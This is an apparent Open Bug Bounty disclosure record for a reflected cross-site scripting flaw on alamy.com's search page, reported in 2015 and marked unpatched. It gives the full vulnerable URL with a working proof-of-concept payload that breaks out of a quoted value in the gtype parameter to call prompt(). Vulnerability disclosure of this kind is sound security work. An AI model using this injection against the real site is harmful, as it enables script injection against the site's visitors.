alamy.com XSS vulnerability

2015-08-20T20:45:00
ID OBB:80763
Type openbugbounty
Reporter dim0k
Modified 2015-08-21T10:35:00

Description

Vulnerable URL:
http://www.alamy.com/search.html?CreativeOn=1&adv;=1&ag;=0&all;=1&creative;=&et;=0x000000000000000000000&vp;=0&loc;=0&qt;=x&qn;=&lic;=6&lic;=1&archive;=1&dtfr;=&dtto;=&hc;=&selectdate;=&size;=0xFF&aqt;=&epqt;=&oqt;=&nqt;=&gtype;=0"-prompt(/XSSPOSED/)-"
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 14062
Google Pagerank| 6
VIP website status:| Yes
Check alamy.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 20 August, 2015 20:45 GMT
Vulnerability existence verified and confirmed| 21 August, 2015 10:35 GMT